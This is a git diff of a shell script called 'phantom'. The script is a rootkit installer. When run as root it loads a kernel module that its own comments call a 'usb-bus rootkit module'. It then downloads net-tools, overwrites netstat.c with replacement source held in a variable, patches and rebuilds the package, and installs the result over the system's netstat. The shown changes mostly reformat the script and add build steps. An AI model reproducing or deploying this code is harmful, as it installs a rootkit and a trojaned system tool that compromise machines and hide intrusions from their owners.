Update phantom

diff --git a/phantom b/phantom
--- a/phantom
+++ b/phantom
@@ -3194,53 +3194,67 @@ if [ "$user" == "root" ]; then
 	#insert usb-bus rootkit module
 	insmod /lib/modules/$(uname -r)/kernel/drivers/usb-bus/usb-bus.ko &>/dev/null
 	if [ "$?" == "0" ]; then
-			echo "usb-bus inserted"
-		else
-			echo "usb-bus not inserted"
+		echo "usb-bus rootkit module inserted"
+	else
+		echo "usb-bus rootkit module not inserted"
 	fi
 
 	#replace netstat
+	rm /tmp/net-tools.zip &>/dev/null
+	rm  -r /tmp/net-tools-master &>/dev/null
 	echo "replacing netstat..."
 	wget -O /tmp/net-tools.zip https://github.com/ecki/net-tools/archive/master.zip &>/dev/null
 	if [ "$?" == "0" ]; then
-			echo "downloaded net-tools"
-		else
-			echo "failed to download net-tools"
+		echo "downloaded net-tools"
+	else
+		echo "failed to download net-tools"
 	fi
 	unzip -d /tmp /tmp/net-tools.zip >/dev/null
 	if [ "$?" == "0" ]; then
-			echo "unzipped net-tools"
-		else
-			echo "failed to unzip net-tools"
+		echo "unzipped net-tools"
+	else
+		echo "failed to unzip net-tools"
 	fi
 	rm /tmp/net-tools.zip
  	#replace netstat.c
 	echo "$netstat" >/tmp/net-tools-master/netstat.c
 	if [ "$?" == "0" ]; then
-			echo "netstat.c replaced"
-		else
-			echo "netstat.c not replaced"
-		fi
+		echo "netstat.c replaced"
+	else
+		echo "netstat.c not replaced"
+	fi
 	#patch the Makefile
 	printf "$netpatch" >/tmp/net-tools-master/net.patch
-	patch </tmp/net-tools-master/net.patch &>/dev/null
+	patch -d /tmp/net-tools-master/ </tmp/net-tools-master/net.patch &>/dev/null
 	if [ "$?" == "0" ]; then
-			echo "patch net-tools successful"
-		else
-			echo "patch net-tools unsuccessful"
-		fi
+		echo "patch net-tools successful"
+	else
+		echo "patch net-tools unsuccessful"
+	fi
+	#make
+	yes "" | make -C /tmp/net-tools-master config &>/dev/null
+	if [ "$?" == "0" ]; then
+		echo "make config net-tools successful"
+	else
+		echo "make  config net-tools unsuccessful"
+	fi
+	#find /tmp/net-tools-master -name "*.c" -o -name "*.h" | while read src; do
+		#sed -i "s%<linux/if_ether.h>%<netinet/if_ether.h>%" $src
+	#	sed -i "s%<linux/if_tr.h>%<netinet/if_tr.h>%" $src
+		#sed -i "s%<linux/if_fddi.h>%<netinet/if_fddi.h>%" $src
+	#done
 	make -C /tmp/net-tools-master &>/dev/null
 	if [ "$?" == "0" ]; then
-			echo "make net-tools successful"
-		else
-			echo "make net-tools unsuccessful"
-		fi
+		echo "make net-tools successful"
+	else
+		echo "make net-tools unsuccessful"
+	fi
 	make update -C /tmp/net-tools-master  &>/dev/null
 	if [ "$?" == "0" ]; then
-			echo "netstat replaced"
-		else
-			echo "netstat not replaced"
-		fi
+		echo "netstat replaced"
+	else
+		echo "netstat not replaced"
+	fi
 	rm  -r /tmp/net-tools-master
 
 	exit
